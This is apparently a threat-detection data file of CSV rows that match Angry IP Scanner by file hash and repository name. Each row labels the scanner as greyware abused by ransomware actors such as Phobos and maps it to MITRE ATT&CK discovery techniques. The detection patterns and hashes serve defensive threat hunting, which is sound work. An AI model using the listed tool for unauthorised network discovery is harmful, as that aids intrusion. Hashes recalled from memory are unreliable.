"*935c0c6c3eee84d0550edaf387712dd24924d94ae327244ae36611c4ebbeda49*",".{0,1000}935c0c6c3eee84d0550edaf387712dd24924d94ae327244ae36611c4ebbeda49.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*94e9de0688840caca05e9d77b64b3c1e5ff94d9c45cb5715395d419ae09c7559*",".{0,1000}94e9de0688840caca05e9d77b64b3c1e5ff94d9c45cb5715395d419ae09c7559.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*95124c125ab9185d2895ee5462d67235f7391e79288ddef6f3ffb3c918da6fcb*",".{0,1000}95124c125ab9185d2895ee5462d67235f7391e79288ddef6f3ffb3c918da6fcb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9590b53e0fb6f32911ba12dd08129a125fda9f2be61225233d851570655cd962*",".{0,1000}9590b53e0fb6f32911ba12dd08129a125fda9f2be61225233d851570655cd962.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*95eadd9a35d11abd017c6355f1b1cfbe7b566cee62bead208c64931c25f610e6*",".{0,1000}95eadd9a35d11abd017c6355f1b1cfbe7b566cee62bead208c64931c25f610e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*969f92d8c70737c5c3e3bff8379c3d432188ebacd379428b8a49def2ca8fd582*",".{0,1000}969f92d8c70737c5c3e3bff8379c3d432188ebacd379428b8a49def2ca8fd582.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*974aa1a4d6ec99c9db926c0d46c76e7158c5d554a1b5a46cc36620244a27f39e*",".{0,1000}974aa1a4d6ec99c9db926c0d46c76e7158c5d554a1b5a46cc36620244a27f39e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*974b582afcd5cb78733171a0b1a532b3d06203f5f2731acfe3958e68716c0b3c*",".{0,1000}974b582afcd5cb78733171a0b1a532b3d06203f5f2731acfe3958e68716c0b3c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9919f925721fc891959663daa9b9f472f75d97396bf60c1baf9ee3c10a89f73b*",".{0,1000}9919f925721fc891959663daa9b9f472f75d97396bf60c1baf9ee3c10a89f73b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*99833f7e6a8120d3f1df7098d8314d6469439a6dca2841ddeffe570e1f14bed2*",".{0,1000}99833f7e6a8120d3f1df7098d8314d6469439a6dca2841ddeffe570e1f14bed2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9a2a18d4f18f7a64c52cfe036a86f5bb2f7f7770d70031a8773df3856895a082*",".{0,1000}9a2a18d4f18f7a64c52cfe036a86f5bb2f7f7770d70031a8773df3856895a082.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9a560a6c7ad81192188dad3e3eb2cd752f552739876009f15e8aa31f8be45f39*",".{0,1000}9a560a6c7ad81192188dad3e3eb2cd752f552739876009f15e8aa31f8be45f39.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9aa60c69492c8b3ef312ec4410e0574eb054cf7ca9785f7c4d89d83277143785*",".{0,1000}9aa60c69492c8b3ef312ec4410e0574eb054cf7ca9785f7c4d89d83277143785.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9b473206df119def590d2f515c19cb3db7084c1d3a2ec1199313f551bd6013ec*",".{0,1000}9b473206df119def590d2f515c19cb3db7084c1d3a2ec1199313f551bd6013ec.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9d0597a638eabb7fff63dc41d6449d47fce11f4491a703d0447e78d53387fe38*",".{0,1000}9d0597a638eabb7fff63dc41d6449d47fce11f4491a703d0447e78d53387fe38.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9d0edb290dc290f8cb748123558db11a3477269f810618a86ff8e81f30830e08*",".{0,1000}9d0edb290dc290f8cb748123558db11a3477269f810618a86ff8e81f30830e08.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9d1fb01df8a856d1bc633277add91aedeec15f773192a8733de3ed747784c916*",".{0,1000}9d1fb01df8a856d1bc633277add91aedeec15f773192a8733de3ed747784c916.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9e68d5982934294b5ef4bd570efd96b170d6a2aec1507cb4f248911da72380be*",".{0,1000}9e68d5982934294b5ef4bd570efd96b170d6a2aec1507cb4f248911da72380be.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9eb625cc9e117d567ed568453ab0e5d9d1c9af2584338fb78640a1fb03dcd1c1*",".{0,1000}9eb625cc9e117d567ed568453ab0e5d9d1c9af2584338fb78640a1fb03dcd1c1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9f29ce88a53096c66bdd2dcb1b1e04b305358bef7aaa681a5fa8cd8ef406e63b*",".{0,1000}9f29ce88a53096c66bdd2dcb1b1e04b305358bef7aaa681a5fa8cd8ef406e63b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*9fb81c3c3003985257be77b5ff0e531de79ecc35fc84c98a92a59e8ca88e25f1*",".{0,1000}9fb81c3c3003985257be77b5ff0e531de79ecc35fc84c98a92a59e8ca88e25f1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a040131b51b4e124e4ac5a2cfa2e66adf3f7f279f98c86359870285bff228f42*",".{0,1000}a040131b51b4e124e4ac5a2cfa2e66adf3f7f279f98c86359870285bff228f42.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a2031a3ae2df3902ff26bfeff68f5c04a852e0d815b8e8dcbb2085f08b23656f*",".{0,1000}a2031a3ae2df3902ff26bfeff68f5c04a852e0d815b8e8dcbb2085f08b23656f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a26411f870a108af946d0b0298a2af36b88a3de21af299e71211e6da101f8e41*",".{0,1000}a26411f870a108af946d0b0298a2af36b88a3de21af299e71211e6da101f8e41.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a2749791478d33e10f88bba9c8191f42614e8606189f3a01a1406a2b47227a79*",".{0,1000}a2749791478d33e10f88bba9c8191f42614e8606189f3a01a1406a2b47227a79.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a4c9bcf5a748e432e6ae84393c4d174d7f1b7cc6a3e7308183ac829970b73e6e*",".{0,1000}a4c9bcf5a748e432e6ae84393c4d174d7f1b7cc6a3e7308183ac829970b73e6e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a66fa8f23507c11444e52e58ea00e3b38e972a5d95fdb51a824967fd8183460a*",".{0,1000}a66fa8f23507c11444e52e58ea00e3b38e972a5d95fdb51a824967fd8183460a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a6d7077ea6b3c4aeb393c266652682661f77e334b1809372eb260f9d24d2e648*",".{0,1000}a6d7077ea6b3c4aeb393c266652682661f77e334b1809372eb260f9d24d2e648.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a70208a1f564cce41472dc8e87cd9e4d9bff7feb6ca03407282ffdd935967ba3*",".{0,1000}a70208a1f564cce41472dc8e87cd9e4d9bff7feb6ca03407282ffdd935967ba3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a74c5c5699517281aa37e2b00acb36a32b33d7d7c686a41c8d6fc2a1594d3611*",".{0,1000}a74c5c5699517281aa37e2b00acb36a32b33d7d7c686a41c8d6fc2a1594d3611.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a75a10d43c1ec77f2e59232d6c4f66662d7d3c9d28195d3b4aa9e201d0d28ae6*",".{0,1000}a75a10d43c1ec77f2e59232d6c4f66662d7d3c9d28195d3b4aa9e201d0d28ae6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a79bc1f4c36a377d1beb707300e47c0ba6c3bea953f77f6e2a0435a5a23f1cd3*",".{0,1000}a79bc1f4c36a377d1beb707300e47c0ba6c3bea953f77f6e2a0435a5a23f1cd3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a7c7396da9d14ba531ea5c09d8920ad52eb2300b2d48ed368413cb77c5035ce4*",".{0,1000}a7c7396da9d14ba531ea5c09d8920ad52eb2300b2d48ed368413cb77c5035ce4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a95f17316afad267ca57989a4480fc157aa50618868cb19defe14e45cda7e23b*",".{0,1000}a95f17316afad267ca57989a4480fc157aa50618868cb19defe14e45cda7e23b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a9aae83a121f855ea420850fe6bb8b01e80e3dcbafcb50d819cb2f71de8fbeb7*",".{0,1000}a9aae83a121f855ea420850fe6bb8b01e80e3dcbafcb50d819cb2f71de8fbeb7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*a9cb54d1e2377be31945692f6206a98056419b6ca641a3e79eada2a259e22226*",".{0,1000}a9cb54d1e2377be31945692f6206a98056419b6ca641a3e79eada2a259e22226.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*aa67b66d9c4124b52e572988493b78cda3ff438dc27988ff30338c3f6d38e34b*",".{0,1000}aa67b66d9c4124b52e572988493b78cda3ff438dc27988ff30338c3f6d38e34b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*aa9ef9b244e7b5d88f24211586a2e10d553a7c80f9a6d17a3d5d783d115b2f47*",".{0,1000}aa9ef9b244e7b5d88f24211586a2e10d553a7c80f9a6d17a3d5d783d115b2f47.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ab4b3257fd667f9daf4cfbe54992b99c378a1a2e6922fe5d955cdaca6da99f3b*",".{0,1000}ab4b3257fd667f9daf4cfbe54992b99c378a1a2e6922fe5d955cdaca6da99f3b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ab8428de3f3f1eb1fb54c974d71296373466ccb7c9bedef96329d6fbfcc23947*",".{0,1000}ab8428de3f3f1eb1fb54c974d71296373466ccb7c9bedef96329d6fbfcc23947.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ac1e2d8de30ae0048cfe3ae27fbddcf3e16e38dcb33d9b83c16f32831c865219*",".{0,1000}ac1e2d8de30ae0048cfe3ae27fbddcf3e16e38dcb33d9b83c16f32831c865219.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*acd40244ed0a4264f5bafafbf9ca8e4b3813b27013bce2c550cd9f5e8093c8b8*",".{0,1000}acd40244ed0a4264f5bafafbf9ca8e4b3813b27013bce2c550cd9f5e8093c8b8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ad2ce18715d8811efe3071d94d6cac4b1f0a60dd4e6b95c0bb43e9b9f3dc2921*",".{0,1000}ad2ce18715d8811efe3071d94d6cac4b1f0a60dd4e6b95c0bb43e9b9f3dc2921.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*ae50c71517182c9773bb138745f10a643b1215078ede439b2b3adb486a9cfb14*",".{0,1000}ae50c71517182c9773bb138745f10a643b1215078ede439b2b3adb486a9cfb14.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*angryip/ipscan*",".{0,1000}angryip\/ipscan.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b087a02bc2325dcbb06caa40e7debe301dea47b89f1e4a875092835e056f0b73*",".{0,1000}b087a02bc2325dcbb06caa40e7debe301dea47b89f1e4a875092835e056f0b73.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b0a1898b536d811f388b3fddd94d50c8bcec6e87f11a7c36e5d4e5761563eb4f*",".{0,1000}b0a1898b536d811f388b3fddd94d50c8bcec6e87f11a7c36e5d4e5761563eb4f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b190ff95d6d155e9a49752a555ca8ba14fe9e40156ec8cc5f8bcb6b0674cb80e*",".{0,1000}b190ff95d6d155e9a49752a555ca8ba14fe9e40156ec8cc5f8bcb6b0674cb80e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b31e9e186194897b6b75e122c5ea4bf20170a485ff31faf312612514fe7b92ec*",".{0,1000}b31e9e186194897b6b75e122c5ea4bf20170a485ff31faf312612514fe7b92ec.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b3b8e7d50a413a441df3ee1d510d3a9f537f9bc3a8da6119814da8da34940e64*",".{0,1000}b3b8e7d50a413a441df3ee1d510d3a9f537f9bc3a8da6119814da8da34940e64.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b3f9f99ab501e8c40099dc351b2a59281e6a6b8117deae1e0d820ea70dd6a041*",".{0,1000}b3f9f99ab501e8c40099dc351b2a59281e6a6b8117deae1e0d820ea70dd6a041.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b411cbafc30aeeb59c69803b5f962f87a653fdf4a4a6f4292ecb6280978c0cc2*",".{0,1000}b411cbafc30aeeb59c69803b5f962f87a653fdf4a4a6f4292ecb6280978c0cc2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b624a1f6b4582374715c11809ec8cfc7f8d6b15ee426b0027357377eb5e250a3*",".{0,1000}b624a1f6b4582374715c11809ec8cfc7f8d6b15ee426b0027357377eb5e250a3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b7c1564546c8c57f4c1581d8473ae7a88ecba2e2a114178f8862ed8a15c93e16*",".{0,1000}b7c1564546c8c57f4c1581d8473ae7a88ecba2e2a114178f8862ed8a15c93e16.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b855b843211e9604d22362e14906b73b7016f230b11aab67047ac8b4e071da18*",".{0,1000}b855b843211e9604d22362e14906b73b7016f230b11aab67047ac8b4e071da18.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b8b12628c324cddb1e1a464c1caf2597b66ce8f5f1057ffa86c1fe7b1c241b40*",".{0,1000}b8b12628c324cddb1e1a464c1caf2597b66ce8f5f1057ffa86c1fe7b1c241b40.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*b9593e94892849b50e819c070843639953a69917a9069cb603433b3261519be7*",".{0,1000}b9593e94892849b50e819c070843639953a69917a9069cb603433b3261519be7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
